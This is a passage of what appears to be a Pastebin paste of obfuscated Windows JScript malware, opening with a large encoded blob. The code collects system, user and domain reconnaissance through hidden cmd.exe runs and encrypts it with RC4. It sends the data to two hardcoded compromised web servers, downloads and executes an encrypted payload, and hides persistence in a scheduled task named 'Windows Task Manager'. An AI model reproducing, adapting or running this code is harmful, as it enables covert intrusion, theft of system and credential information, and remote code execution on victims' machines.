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";
    191. return qGxZ;
    192. }
    193. ## ---- decoded eval
    194. function UspD(zDmy) {
    195. var m3mH = WScript.CreateObject("ADODB.Stream")
    196. m3mH.Type = 2;
    197. m3mH.CharSet = '437';
    198. m3mH.Open();
    199. m3mH.LoadFromFile(zDmy);
    200. var c0xi = m3mH.ReadText;
    201. m3mH.Close();
    202. return cz_b(c0xi);
    203. }
    204. var CKpR = new Array("http://www.saipadiesel124.com/wp-content/plugins/imsanity/tmp.php", "http://www.folk-cantabria.com/wp-content/plugins/wp-statistics/includes/classes/gallery_create_page_field.php");
    205. var tpO8 = "w3LxnRSbJcqf8HrU";
    206. var auME = new Array("systeminfo > ", "net view >> ", "net view /domain >> ", "tasklist /v >> ", "gpresult /z >> ", "netstat -nao >> ", "ipconfig /all >> ", "arp -a >> ", "net share >> ", "net use >> ", "net user >> ", "net user administrator >> ", "net user /domain >> ", "net user administrator /domain >> ", "set >> ", "dir %systemdrive%\x5cUsers\x5c*.* >> ", "dir %userprofile%\x5cAppData\x5cRoaming\x5cMicrosoft\x5cWindows\x5cRecent\x5c*.* >> ", "dir %userprofile%\x5cDesktop\x5c*.* >> ", "tasklist /fi \x22modules eq wow64.dll\x22 >> ", "tasklist /fi \x22modules ne wow64.dll\x22 >> ", "dir \x22%programfiles(x86)%\x22 >> ", "dir \x22%programfiles%\x22 >> ", "dir %appdata% >>");
    207. var QUjy = new ActiveXObject("Scripting.FileSystemObject");
    208. var LIxF = WScript.ScriptName;
    209. var w5mY = "";
    210. var ruGx = TfOh();
    212. function hLit(XngP, y1qa) {
    213. char_set = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    214. var Rj3c = "";
    215. var OKpB = "";
    216. for (var i = 0; i < XngP.length; ++i) {
    217. var B8wU = XngP.charCodeAt(i);
    218. var LUxg = B8wU.toString(2);
    219. while (LUxg.length < (y1qa ? 8 : 16))
    220. LUxg = "0" + LUxg;
    221. OKpB += LUxg;
    222. while (OKpB.length >= 6) {
    223. var vjUu = OKpB.slice(0, 6);
    224. OKpB = OKpB.slice(6);
    225. Rj3c += this.char_set.charAt(parseInt(vjUu, 2));
    226. }
    227. }
    228. if (OKpB) {
    229. while (OKpB.length < 6) OKpB += "0";
    230. Rj3c += this.char_set.charAt(parseInt(OKpB, 2));
    231. }
    232. while (Rj3c.length % (y1qa ? 4 : 8) != 0)
    233. Rj3c += "=";
    234. return Rj3c;
    235. }
    236. var b92A = [];
    237. b92A['C7'] = '80';
    238. b92A['FC'] = '81';
    239. b92A['E9'] = '82';
    240. b92A['E2'] = '83';
    241. b92A['E4'] = '84';
    242. b92A['E0'] = '85';
    243. b92A['E5'] = '86';
    244. b92A['E7'] = '87';
    245. b92A['EA'] = '88';
    246. b92A['EB'] = '89';
    247. b92A['E8'] = '8A';
    248. b92A['EF'] = '8B';
    249. b92A['EE'] = '8C';
    250. b92A['EC'] = '8D';
    251. b92A['C4'] = '8E';
    252. b92A['C5'] = '8F';
    253. b92A['C9'] = '90';
    254. b92A['E6'] = '91';
    255. b92A['C6'] = '92';
    256. b92A['F4'] = '93';
    257. b92A['F6'] = '94';
    258. b92A['F2'] = '95';
    259. b92A['FB'] = '96';
    260. b92A['F9'] = '97';
    261. b92A['FF'] = '98';
    262. b92A['D6'] = '99';
    263. b92A['DC'] = '9A';
    264. b92A['A2'] = '9B';
    265. b92A['A3'] = '9C';
    266. b92A['A5'] = '9D';
    267. b92A['20A7'] = '9E';
    268. b92A['192'] = '9F';
    269. b92A['E1'] = 'A0';
    270. b92A['ED'] = 'A1';
    271. b92A['F3'] = 'A2';
    272. b92A['FA'] = 'A3';
    273. b92A['F1'] = 'A4';
    274. b92A['D1'] = 'A5';
    275. b92A['AA'] = 'A6';
    276. b92A['BA'] = 'A7';
    277. b92A['BF'] = 'A8';
    278. b92A['2310'] = 'A9';
    279. b92A['AC'] = 'AA';
    280. b92A['BD'] = 'AB';
    281. b92A['BC'] = 'AC';
    282. b92A['A1'] = 'AD';
    283. b92A['AB'] = 'AE';
    284. b92A['BB'] = 'AF';
    285. b92A['2591'] = 'B0';
    286. b92A['2592'] = 'B1';
    287. b92A['2593'] = 'B2';
    288. b92A['2502'] = 'B3';
    289. b92A['2524'] = 'B4';
    290. b92A['2561'] = 'B5';
    291. b92A['2562'] = 'B6';
    292. b92A['2556'] = 'B7';
    293. b92A['2555'] = 'B8';
    294. b92A['2563'] = 'B9';
    295. b92A['2551'] = 'BA';
    296. b92A['2557'] = 'BB';
    297. b92A['255D'] = 'BC';
    298. b92A['255C'] = 'BD';
    299. b92A['255B'] = 'BE';
    300. b92A['2510'] = 'BF';
    301. b92A['2514'] = 'C0';
    302. b92A['2534'] = 'C1';
    303. b92A['252C'] = 'C2';
    304. b92A['251C'] = 'C3';
    305. b92A['2500'] = 'C4';
    306. b92A['253C'] = 'C5';
    307. b92A['255E'] = 'C6';
    308. b92A['255F'] = 'C7';
    309. b92A['255A'] = 'C8';
    310. b92A['2554'] = 'C9';
    311. b92A['2569'] = 'CA';
    312. b92A['2566'] = 'CB';
    313. b92A['2560'] = 'CC';
    314. b92A['2550'] = 'CD';
    315. b92A['256C'] = 'CE';
    316. b92A['2567'] = 'CF';
    317. b92A['2568'] = 'D0';
    318. b92A['2564'] = 'D1';
    319. b92A['2565'] = 'D2';
    320. b92A['2559'] = 'D3';
    321. b92A['2558'] = 'D4';
    322. b92A['2552'] = 'D5';
    323. b92A['2553'] = 'D6';
    324. b92A['256B'] = 'D7';
    325. b92A['256A'] = 'D8';
    326. b92A['2518'] = 'D9';
    327. b92A['250C'] = 'DA';
    328. b92A['2588'] = 'DB';
    329. b92A['2584'] = 'DC';
    330. b92A['258C'] = 'DD';
    331. b92A['2590'] = 'DE';
    332. b92A['2580'] = 'DF';
    333. b92A['3B1'] = 'E0';
    334. b92A['DF'] = 'E1';
    335. b92A['393'] = 'E2';
    336. b92A['3C0'] = 'E3';
    337. b92A['3A3'] = 'E4';
    338. b92A['3C3'] = 'E5';
    339. b92A['B5'] = 'E6';
    340. b92A['3C4'] = 'E7';
    341. b92A['3A6'] = 'E8';
    342. b92A['398'] = 'E9';
    343. b92A['3A9'] = 'EA';
    344. b92A['3B4'] = 'EB';
    345. b92A['221E'] = 'EC';
    346. b92A['3C6'] = 'ED';
    347. b92A['3B5'] = 'EE';
    348. b92A['2229'] = 'EF';
    349. b92A['2261'] = 'F0';
    350. b92A['B1'] = 'F1';
    351. b92A['2265'] = 'F2';
    352. b92A['2264'] = 'F3';
    353. b92A['2320'] = 'F4';
    354. b92A['2321'] = 'F5';
    355. b92A['F7'] = 'F6';
    356. b92A['2248'] = 'F7';
    357. b92A['B0'] = 'F8';
    358. b92A['2219'] = 'F9';
    359. b92A['B7'] = 'FA';
    360. b92A['221A'] = 'FB';
    361. b92A['207F'] = 'FC';
    362. b92A['B2'] = 'FD';
    363. b92A['25A0'] = 'FE';
    364. b92A['A0'] = 'FF';
    366. function TfOh() {
    367. var ayuh = Math.ceil(Math.random() * 10 + 25);
    368. var name = String.fromCharCode(Math.ceil(Math.random() * 24 + 65));
    369. var dc9V = WScript.CreateObject("WScript.Network");
    370. w5mY = dc9V.UserName;
    371. for (var count = 0; count < ayuh; count++) {
    372. switch (Math.ceil(Math.random() * 3)) {
    373. case 1:
    374. name = name + Math.ceil(Math.random() * 8);
    375. break;
    376. case 2:
    377. name = name + String.fromCharCode(Math.ceil(Math.random() * 24 + 97));
    378. break;
    379. default:
    380. name = name + String.fromCharCode(Math.ceil(Math.random() * 24 + 65));
    381. break;
    382. }
    383. }
    384. return name;
    385. }
    386. var wyKN = Blgx(bIdG());
    387. try {
    388. var WE86 = bIdG();
    389. rGcR();
    390. jSm8();
    391. } catch (e) {
    392. WScript.Quit();
    393. }
    395. function jSm8() {
    396. var c9lr = Fv6b();
    397. while (true) {
    398. for (var i = 0; i < CKpR.length; i++) {
    399. var Ysyo = CKpR[i];
    400. var f3cb = XEWG(Ysyo, c9lr);
    401. switch (f3cb) {
    402. case "good":
    403. break;
    404. case "exit":
    405. WScript.Quit();
    406. break;
    407. case "work":
    408. XBL3(Ysyo);
    409. break;
    410. case "fail":
    411. tbMu();
    412. break;
    413. default:
    414. break;
    415. }
    416. TfOh();
    417. }
    418. WScript.Sleep((Math.random() * 300 + 3600) * 1000);
    419. }
    420. }
    422. function bIdG() {
    423. var spq3 = this['\u0041\u0063\u0074i\u0076eX\u004F\u0062j\u0065c\u0074'];
    424. var zBVv = new spq3('\u0057\u0053cr\u0069\u0070\u0074\u002E\u0053he\u006C\u006C');
    425. return zBVv;
    426. }
    428. function XBL3(B_TG) {
    429. var YIme = wyKN + LIxF.substring(0, LIxF.length - 2) + "pif";
    430. var Kpxo = new ActiveXObject("MSXML2.XMLHTTP");
    431. Kpxo.OPEN("post", B_TG, false);
    432. Kpxo.SETREQUESTHEADER("user-agent:", "Mozilla/5.0 (Windows NT 6.1; Win64; x64); " + Sz8k());
    433. Kpxo.SETREQUESTHEADER("content-type:", "application/octet-stream");
    434. Kpxo.SETREQUESTHEADER("content-length:", "4");
    435. Kpxo.SEND("work");
    436. if (QUjy.FILEEXISTS(YIme)) {
    437. QUjy.DELETEFILE(YIme);
    438. }
    439. if (Kpxo.STATUS == 200) {
    440. var m3mH = new ActiveXObject("ADODB.STREAM");
    441. m3mH.TYPE = 1;
    442. m3mH.OPEN();
    443. m3mH.WRITE(Kpxo.responseBody);
    444. m3mH.Position = 0;
    445. m3mH.Type = 2;
    446. m3mH.CharSet = "437";
    447. var c0xi = m3mH.ReadText(m3mH.Size);
    448. var ptF0 = FXx9("2f532d6baec3d0ec7b1f98aed4774843", cz_b(c0xi));
    449. NoRS(ptF0, YIme);
    450. m3mH.Close();
    451. }
    452. var ruGx = TfOh();
    453. c5ae(YIme, B_TG);
    454. WScript.Sleep(30000);
    455. QUjy.DELETEFILE(YIme);
    456. }
    458. function tbMu() {
    459. QUjy.DELETEFILE(WScript.SCRIPTFULLNAME);
    460. eV_C("TaskManager", "Windows Task Manager", w5mY, v_FileName, "EzZETcSXyKAdF_e5I2i1", wyKN, false);
    461. KhDn("TaskManager");
    462. WScript.Quit();
    463. }
    465. function XEWG(uXHK, hm2j) {
    466. try {
    467. var Kpxo = new ActiveXObject("MSXML2.XMLHTTP");
    468. Kpxo.OPEN("post", uXHK, false);
    469. Kpxo.SETREQUESTHEADER("user-agent:", "Mozilla/5.0 (Windows NT 6.1; Win64; x64); " + Sz8k());
    470. Kpxo.SETREQUESTHEADER("content-type:", "application/octet-stream");
    471. var rRi3 = hLit(hm2j, true);
    472. Kpxo.SETREQUESTHEADER("content-length:", rRi3.length);
    473. Kpxo.SEND(rRi3);
    474. return Kpxo.responseText;
    475. } catch (e) {
    476. return "";
    477. }
    478. }
    480. function Sz8k() {
    481. var n9mV = "";
    482. var dc9V = WScript.CreateObject("WScript.Network");
    483. var rRi3 = tpO8 + dc9V.ComputerName + w5mY;
    484. for (var i = 0; i < 16; i++) {
    485. var YsXA = 0
    486. for (var j = i; j < rRi3.length - 1; j++) {
    487. YsXA = YsXA ^ rRi3.charCodeAt(j);
    488. }
    489. YsXA = (YsXA % 10);
    490. n9mV = n9mV + YsXA.toString(10);
    491. }
    492. n9mV = n9mV + tpO8;
    493. return n9mV;
    494. }
    496. function rGcR() {
    497. v_FileName = wyKN + LIxF.substring(0, LIxF.length - 2) + "js";
    498. QUjy.COPYFILE(WScript.ScriptFullName, wyKN + LIxF);
    499. var HFp7 = (Math.random() * 150 + 350) * 1000;
    500. WScript.Sleep(HFp7);
    501. eV_C("TaskManager", "Windows Task Manager", w5mY, v_FileName, "EzZETcSXyKAdF_e5I2i1", wyKN, true);
    502. }
    504. function Fv6b() {
    505. var m_Rr = wyKN + "~dat.tmp";
    506. for (var i = 0; i < auME.length; i++) {
    507. WE86.Run("cmd.exe /c " + auME[i] + "\x22" + m_Rr + "\x22", 0, true);
    508. }
    509. var nRVN = UspD(m_Rr);
    510. WScript.Sleep(1000);
    511. QUjy.DELETEFILE(m_Rr);
    512. return FXx9("2f532d6baec3d0ec7b1f98aed4774843", nRVN);
    513. }
    515. function c5ae(YIme, B_TG) {
    516. try {
    517. if (QUjy.FILEEXISTS(YIme)) {
    518. WE86.Run("\x22" + YIme + "\x22");
    519. }
    520. } catch (e) {
    521. var Kpxo = new ActiveXObject("MSXML2.XMLHTTP");
    522. Kpxo.OPEN("post", B_TG, false);
    523. var ePMy = "error";
    524. Kpxo.SETREQUESTHEADER("user-agent:", "Mozilla/5.0 (Windows NT 6.1; Win64; x64); " + Sz8k());
    525. Kpxo.SETREQUESTHEADER("content-type:", "application/octet-stream");
    526. Kpxo.SETREQUESTHEADER("content-length:", ePMy.length);
    527. Kpxo.SEND(ePMy);
    528. return "";
    529. }
    530. }
    532. function RPbY(r_X5) {
    533. var w8rG = "0123456789ABCDEF";
    534. var yjrw = w8rG.substr(r_X5 & 15, 1);
    535. while (r_X5 > 15) {
    536. r_X5 >>>= 4;
    537. yjrw = w8rG.substr(r_X5 & 15, 1) + yjrw;
    538. }
    539. return yjrw;
    540. }
    542. function NptO(jlEi) {
    543. return parseInt(jlEi, 16);
    544. }
    546. function eV_C(Bjmr, RT6x, O7Ec, YBwP, T9Px, egNr, rmGH) {
    547. try {
    548. var BGfI = WScript.CreateObject("Schedule.Service");
    549. BGfI.Connect();
    550. var w2cQ = BGfI.GetFolder("WPD");
    551. var xSm3 = BGfI.NewTask(0);
    552. xSm3.Principal.UserId = O7Ec;
    553. xSm3.Principal.LogonType = 6;
    554. var wK2F = xSm3.RegistrationInfo;
    555. wK2F.Description = RT6x;
    556. wK2F.Author = O7Ec;
    557. var aYbx = xSm3.Settings;
    558. aYbx.Enabled = true;
    559. aYbx.StartWhenAvailable = true;
    560. aYbx.Hidden = rmGH;
    561. var oSP7 = "2015年07月12日T11:47:24";
    562. var svaG = "2020年03月21日T08:00:00";
    563. var LDoN = xSm3.Triggers;
    564. var r9EC = LDoN.Create(9);
    565. r9EC.StartBoundary = oSP7;
    566. r9EC.EndBoundary = svaG;
    567. r9EC.Id = "LogonTriggerId";
    568. r9EC.UserId = O7Ec;
    569. r9EC.Enabled = true;
    570. var gQu9 = xSm3.Actions.Create(0);
    571. gQu9.Path = YBwP;
    572. gQu9.Arguments = T9Px;
    573. gQu9.WorkingDirectory = egNr;
    574. w2cQ.RegisterTaskDefinition(Bjmr, xSm3, 6, "", "", 3);
    575. return true;
    576. } catch (Err) {
    577. return false;
    578. }
    579. }
    581. function KhDn(Bjmr) {
    582. try {
    583. var UGgw = false;
    584. var BGfI = WScript.CreateObject("Schedule.Service");
    585. BGfI.Connect()
    588. var w2cQ = BGfI.GetFolder("WPD");
    589. var FLs6 = w2cQ.GetTasks(0);
    590. if (FLs6.count >= 0) {
    591. var gk1H = new Enumerator(FLs6);
    592. for (; !gk1H.atEnd(); gk1H.moveNext()) {
    593. if (gk1H.item().name == Bjmr) {
    594. w2cQ.DeleteTask(Bjmr, 0);
    595. UGgw = true;
    596. }
    597. }
    598. }
    599. } catch (Err) {
    600. return false;
    601. }
    602. }
    604. function cz_b(S3Ws) {
    605. var n9mV = [];
    606. var mvAu = S3Ws.length;
    607. for (var i = 0; i < mvAu; i++) {
    608. var wtVX = S3Ws.charCodeAt(i);
    609. if (wtVX >= 128) {
    610. var h = b92A['' + RPbY(wtVX)];
    611. wtVX = NptO(h);
    612. }
    613. n9mV.push(wtVX);
    614. }
    615. return n9mV;
    616. }
    618. function NoRS(ExY2, igeK) {
    619. var m3mH = WScript.CreateObject("ADODB.Stream");
    620. m3mH.type = 2;
    621. m3mH.Charset = "iso-8859-1";
    622. m3mH.Open();
    623. m3mH.WriteText(ExY2);
    624. m3mH.Flush();
    625. m3mH.Position = 0;
    626. m3mH.SaveToFile(igeK, 2);
    627. m3mH.close();
    628. }
    630. function Blgx(gaWo) {
    631. wyKN = "c:\x5cUsers\x5c" + w5mY + "\x5cAppData\x5cLocal\x5cMicrosoft\x5cWindows\x5c";
    632. if (!QUjy.FOLDEREXISTS(wyKN))
    633. wyKN = "c:\x5cUsers\x5c" + w5mY + "\x5cAppData\x5cLocal\x5cTemp\x5c";
    634. if (!QUjy.FOLDEREXISTS(wyKN))
    635. wyKN = "c:\x5cDocuments and Settings\x5c" + w5mY + "\x5cApplication Data\x5cMicrosoft\x5cWindows\x5c";
    636. return wyKN
    637. }
    639. function FXx9(Z_3F, VMd7) {
    640. var NNSX = [];
    641. var JDro = 0;
    642. var KagY;
    643. var n9mV = '';
    644. for (var i = 0; i < 256; i++) {
    645. NNSX[i] = i;
    646. }
    647. for (var i = 0; i < 256; i++) {
    648. JDro = (JDro + NNSX[i] + Z_3F.charCodeAt(i % Z_3F.length)) % 256;
    649. KagY = NNSX[i];
    650. NNSX[i] = NNSX[JDro];
    651. NNSX[JDro] = KagY;
    652. }
    653. var i = 0;
    654. var JDro = 0;
    655. for (var y = 0; y < VMd7.length; y++) {
    656. i = (i + 1) % 256;
    657. JDro = (JDro + NNSX[i]) % 256;
    658. KagY = NNSX[i];
    659. NNSX[i] = NNSX[JDro];
    660. NNSX[JDro] = KagY;
    661. n9mV += String.fromCharCode(VMd7[y] ^ NNSX[(NNSX[i] + NNSX[JDro]) % 256]);
    662. }
    663. return n9mV;
    664. }
    Advertisement
    Add Comment
    Please, Sign In to add comment
    Public Pastes
    We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
    Not a member of Pastebin yet?
    Sign Up, it unlocks many cool features!

    AltStyle によって変換されたページ (->オリジナル) /